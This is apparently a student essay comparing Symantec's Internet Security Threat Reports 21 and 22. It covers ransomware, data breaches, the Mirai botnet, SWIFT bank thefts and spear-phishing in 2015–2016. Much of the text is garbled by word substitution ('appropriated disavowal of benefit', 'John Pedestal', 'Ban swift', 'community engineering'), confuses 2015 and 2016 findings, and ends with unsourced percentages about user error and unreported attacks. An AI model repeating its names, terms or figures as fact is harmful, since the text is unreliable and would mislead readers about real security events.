Comparison Report Of ISTR-21 And ISTR-22 (Internet Security Threat Report)
“Perseverance, Inspiration and motivation have always played a key role in any venture. It is not just the brain that matters most, but that which guides them. The character, the heart, generous qualities and progressive forces. What was conceived just an idea materialized slowly into concrete facts. The metamorphosis took endless hours of toil, had its moments of frustration, but in the end everything seemed to have sense”. At this level of understanding it is often difficult to understand to work the wide spectrum of knowledge without proper guidance and advice.
Hence, I take this opportunity to express my heartfelt gratitude to my teacher Dr. Muhammad Mubashir Khan. I acknowledge my profound sense of gratitude to him who have been instrumental for providing me the technical knowledge and moral to complete the report with full understanding.
The given report summarize the aspects of Internet Security Threat Report, volume 21 subjected to year 2016 and volume 22 of year 2017 famous by the acronym of “ISTR”. It is a report that is published by a famous cyber security firm Symantec every year that includes the prospective of every known and reported attacks globally. It helps the information security experts and student to have a review of attacks and system vulnerabilities and techniques that can be exploit by the attacker. It has set up a standout amongst the most complete well springs of Internet risk information in the world through the Symantec Global Intelligence Network, or, in other words of in excess of 63. 8 million assault sensors and records a great many occasions for each second. This system screens danger action in more than 157 nations and regions through a mix of Symantec. Items and administrations, for example, Symantec Deep Sigh Intelligence, Symantec Managed Security Services, Norton shopper items, and other outsider information sources.
Symantec found in excess of 430 million new interesting bits of malware in 2015, up 36 percent from the prior year. Maybe what is generally surprising is that these numbers never again astound us. As reality and online progress toward becoming vague from one another, cybercrime has turned into a piece of our day by day lives. Assaults against organizations and countries hit the features with such normality that we’ve turned out to be numb to the sheer volume and quickening of digital dangers. Most danger reports just begin to expose what’s underneath of the risk scene, while the expansiveness of Symantec’s information empowers the Internet Security Threat Report (ISTR) to analyze various aspects, including focused on assaults, cell phone dangers, online life tricks, and Internet of Things (IoT) vulnerabilities, also as assailants’ strategies, inspirations, and practices.
While there is much to be gained from this complete view into the danger scene, the accompanying are six key discoveries and patterns from 2015. Digital assailants uncovered new levels of aspiration in 2016, a year set apart by remarkable assaults, including multi-million dollar virtual bank heists, unmistakable endeavors to disturb the US appointive process by state-supported gatherings, also, a portion of the greatest appropriated disavowal of benefit (DDoS) assaults on record controlled by a botnet of Internet of Things (IoT) gadgets. While digital assaults figured out how to cause remarkable levels of disturbance, assailants as often as possible utilized exceptionally basic apparatuses and strategies to have a major effect. Zero-day vulnerabilities what’s more, complex malware presently have a tendency to be utilized sparingly and aggressors are progressively endeavoring to stow away on display. They depend on direct approaches, for example, stick phishing messages and “living off the land” by utilizing whatever instruments are on hand, for example, authentic system organization programming and working framework highlights. Mirai, the botnet behind a flood of major DDoS assaults, was fundamentally made out of tainted switches and surveillance cameras, low-fueled also, inadequately anchored gadgets. In the off-base hands, even generally favorable gadgets and programming can be accustomed overwhelming everything in the vicinity.
- The cutting-edge Internet Security Threat Report (ISTR), Volume 21 which was published on April 2016, discloses an organizational shift by the cybercriminals, embracing corporate best practices and forming specialized businesses in order to upsurge the effectiveness of their attacks against organizations and individual users.
- This new class of skilled cybercriminal broaden their scope to whole ecosystem of attackers, spreading the range of organization and user threats and increasing the growth of online crime.
- These organize attack groups are the first to influence zero-day vulnerabilities, using them for their own gain or selling them to low level criminals on the open market where they can swiftly and easily be sold.
- In 2015, the number of zero-day vulnerability exposed more than doubled to a record breaking 54, a 125 percent rise from the previous year, reiterating the crucial part they play in money-spinning targeted attacks.
- Malware increased at a shocking rate with 430 million new malware variants discovered in 2015, algorithm of malware verifies that professional cybercriminals are using their immense resources in attempt to breach the defenses and enter corporate networks.
- Half a billion personal information records stolen or lost in 2015 data overwhelming continue to effect the corporate sector.
- Actually large business groups are targeted for average more than three times in a single year.
- Furthermore, we saw the largest data rupture ever which publicly reported was last year with 191 million records compromised in a single happening, including nine record-breaking reported large breaches.
- 429 million individualities were exposed, number of companies that chose not to report the number of records lost are skipped to 85 percent, a simple estimate by Symantec of those unreported breaches drives real number of records lost to more than half a billion.
- Encryption now used as cybercriminal weapon to hold critical data of corporations and persons as hostage ransomware, it encrypts all of a victim’s content and holds it hostage until a ransom is paid also continued to evolve in 2015, with expansion of crypto-ransomware attacks increasing by 35 percent.
- In year 2016, ransomware spread beyond PCs to smartphones, Mac and Linux systems, with attackers progressively pursuing any network-connected device that could be held hostage for income, demonstrating that the cooperate sector is the next target.
- Malaysia is the most ransomware attacked country by 5069 attacks in 2015 average with 14 attacks in a day.
- Cybercriminals also started to use old fashioned, fake technical support scams, which had 200 percent expansion from last year. The alteration from the previous one is that scammers send fake warning messages to devices like smartphones, urging user to attacker-run call centers in order to fool them into buying useless services.
- A surprising 191 million records were breached, the largest reported mega breach, but it wasn’t only case. In 2015, a record-breaking of nine mega-breaches were reported. (A mega-breach is defined as a breach of more than 10 million records. ) The total reported number of exposed users jumped to 429 million. But this number hides a bigger story. In 2015, more and more companies chose not to disclose the total amount of the breaches they experienced. Companies choosing not to report the number of records lost increased by 85 percent.
- Symantec assessed the unreported breaches pushes the real number of records lost to more than half a billion, but the majority of companies choose to hold back critical details after a breach is a worrying trend. Transparency is critical to security, numerous of data sharing initiatives are ongoing in the security industry, helps us to improve our security products and postures but due to some reasons many of this data is getting harder to collect.
- Major security vulnerabilities in popular websites put us all at risk web administrators still struggle to stay on current patches, there were over one million web attacks against people each and every day in 2015. Many people believe that keeping to well-known, genuine websites will keep them safe from online crime. This is not true. Cybercriminals continue to take advantage of vulnerabilities in legitimate websites to infect users, because website administrators fail to secure their websites.
- More than 75 percent of all legitimate websites have unpatched vulnerabilities. Fifteen percent of legitimate websites have critical vulnerabilities, which means it takes minor effort for cybercriminals to gain access and manipulate these sites for their own purposes.
- Symantec demonstrated proof-of-concept attacks against smart watches and televisions in 2015.
- In 2016 cyber attackers discovered new levels of determination, a year obvious by extraordinary attacks, including multi-million dollar virtual bank thefts, obvious attempts to dislocate the US electoral process by state-funded groups, and some of the major dispersed denial of service (DDoS) attacks on record powered by Internet of Things (IoT) devices.
- While cyber-attacks managed to cause extraordinary levels of interruption, attackers commonly used very simple tools and tactics to make a vast influence.
- Zero-day vulnerabilities and complicated malware now widely used cautiously and attackers are progressively trying to hide in plain vision. They rely on straightforward approaches, such as spear-phishing emails and by using other simple tools like genuine network administration software and operating system features.
- Mirai, the backbone behind rising of major DDoS attacks, was primarily poised of infected routers and security cameras, low-powered and poorly secured devices.
- In the wrong hands, even relatively caring devices and software can be used to distressing effect.
- In 2016 the Targeted attacks were in lots of action, world of cyber intelligence experienced a notable modification towards more evident activity, designed to destabilize and disrupt targeted organizations and countries. Cyber-attacks against the US Democratic Party and the subsequent leak of stolen information were one of the major talking points of the US presidential election.
- With the US Intelligence Community attaching the attacks to Russia and concluding the campaign would have been judged a success, it is likely these tactics will be reused in efforts to influence politics and sow discord in other countries.
- 2016 saw two separate waves of attacks involving destructive malware. Disk-wiping malware was used against targets in Ukraine in January and again in December, attacks which also resulted in power outages. Meanwhile the disk-wiping Trojan Shamoon reappeared after a four-year absence and was used against multiple organizations in Saudi Arabia. The increase in troublesome attacks coincided with a decline in some covert activity, specifically economic spying, the theft of intellectual property, and trade secrets.
- Following a 2015 agreement between the US and China, which saw both countries promise not to conduct economic spying in cyber space, detections of malware linked to suspected Chinese intelligence groups dropped considerably.
- On the other hand, this does not mean financial spying has extinct exclusively and comes at a time when other forms of targeted attack, such as rebellion or high-level economical attacks, have increased.
- Financial raids: Cyber attackers chase the big nicks until recently, cyber criminals mainly concentrated on bank customers, raiding accounts or stealing credit cards. Nevertheless, a new sort of attacker has bigger desires and is targeting the banks themselves, sometimes attempting to steal millions of dollars in a single attack. Gangs such as Carbanak have led the way, representative the potential of this approach by dragging off a string of attacks against US banks.
- During 2016, two other outfits upped the gamble by launching even more aspiring attacks. The Ban swift group managed to steal US$81 million from Bangladesh’s central bank by misusing weaknesses in the bank’s security to penetrate its network and steal its SWIFT credentials, allowing them to make the fake transactions.
- Additional group, known as Odinaff, was also found to be growing classy attacks against banks and other economic institutions. It too seemed to be using malware to hide customers’ own records of SWIFT messages linking to fake transactions approved out by the group. While Ban swift and Odinaff established some technical expertise and employed strategies related with advanced groups, much less classy groups also stole huge sums of money. Business email compromise (BEC) cons, which depend on little more than carefully self-possessed spear-phishing emails, continue to source major losses; more than $3 billion has been stolen in the past three years.
- Corporeal off the land. Attackers reaching from cyber criminals to state-sponsored groups have instigated to change their strategies, production more use of operating system features, off-the-shelf outfits, and cloud services to cooperation their losses. The most high-profile case of a living off the land attack appropriated place during the US elections. A simple spear-phishing email provided access to Hillary Clinton’s campaign chairman John Pedestal’s Gmail account without the use of any malware or vulnerabilities. “Living off the land”—making use of the resources at hand rather than malware and exploits—provides many rewards to attackers.
- Recognizing and misusing zero days has become harder as enhancements in secure development and plenty programs take grip. Web attack toolkits have dropped out of service, likely due to the effort essential in keeping fresh activities and a backend organization. Powerful scripting tools, such as PowerShell and macros, are default features of Windows and Microsoft Office that can simplify remote access and malware downloads without the use of susceptibilities or malicious tools.
- In spite of current for almost 20 years, Office macros have resurfaced on the threat landscape as attackers use community engineering techniques to easily overthrow security measures that were put in place to challenge the former problem of macro viruses. When effected well, living off the land attitudes can result in almost symptomless pollutions, allowing attackers to hide in plain vision. Rebirth of email as favored attack channel Malicious emails were the firearm of choice for a wide range of cyber-attacks throughout 2016, used by everybody from state- supported cyber spying groups to mass-mailing ransom ware mobs.
- One in 131 emails sent were malicious, the uppermost rate in five years. Email’s renewed approval has been ambitious by several issues. It is a established attack channel. It doesn’t trust on weaknesses, but instead uses simple dishonesty to trap victims into opening attachments, following links, or disclosing their identifications. Spear-phishing emails, such as deceived emails teaching targets to reset their Gmail password, were used in the US voting attacks. Ransom ware embracing victims with ever-increasing demands Ransom ware remains to wave businesses and consumers, with unselective movements pushing out huge volumes of malicious emails. In some cases, administrations can be overcome by the pure volume of ransom ware-laden emails they obtain. Attackers are challenging more and more from victims with the regular ransom request in 2016 rising to $1,077, up from $294 a year previous.
- Attackers have improved a business model that typically includes malware concealed in in offensive emails, strong encryption, and unidentified ransom expense involving crypto currencies. The success of this business model has understood a rising number of attackers jump on the movement. The number of new ransom ware relations exposed during 2016 more than augmented to 98 and Symantec logged a 36 percent increase in ransom ware contagions.
- New limits: IoT and cloud move into the attention while ransom ware and economic scam groups continue to posture the biggest risk to end users, other fears are beginning to arise. It was only a matter of time before attacks on IoT devices began to gain energy, and 2016 saw the first major incident with the appearance of Mirai, a botnet composed of IoT devices such as routers and security cameras. Weak security ended these devices easy spoils for attackers, who constructed a botnet big enough to transmit out the largest DDoS attack ever realized.
- Symantec seen a double increase in struggled attacks against IoT devices over the course of 2016 and, at times of highest activity, the average IoT device was criticized once every two minutes. Several of Mirai’s targets were cloud-related facilities, such as DNS provider Dyne. This, coupled with the hacking of millions of MongoDB databases hosted in the cloud, shows how cloud attacks have develop a authenticity and are likely to increase in 2017. A growing confidence on cloud services should be a zone of anxiety for enterprises as they present a security sightless spot. Symantec found that the normal organization was using 928 cloud apps, up from 841 earlier in the year.
- Nevertheless, most CIOs consider their organizations only use around 30 or 40 cloud apps, meaning the level of risk could be undervalued, leaving them open to attack from freshly up-and-coming threats. The targeted attack background in 2016 was a remarkably active year for targeted attack clusters, with distinguished events occurring in Europe, the US, Asia, and the Middle East. As the year proceeded, the level of high-profile activity seemed to intensify, with politically subversive incidents directed at the United States and destructive malware targeting Saudi Arabia and Ukraine.
- A wide variety of targeted attack groups is in process today. While the worldwide powers all have an established skill to behavior a variety of cyber operations, provincial powers have also moved into cyber space with their own cyber spying operations absorbed at competing countries and internal opposition groups. The Distinguished targeted attack group’s graphic lists 10 of the most important groups that were active in 2016 and that have been openly linked to nation positions.
As we discussed the variety of attacks that been observed in year 2016 and 2017 which were of every aspect from banking sector to cooperate level and from education to individual. No any area of profession from these attacks. In order to overcome these situation instant measures needs to be taken, by spreading the awareness in the user because as we seen 90 percent of attacks were due to user own lack ness. Second we need to deploy an element of trust because about 60 percent of attacks are not reported due to some unknown reasons and due to which certain steps can’t be taken in order to avoid such attacks. ISTR gives a reason able report by that we can upraise the awareness to some extent in user.
Cite this Essay
To export a reference to this article please select a referencing style below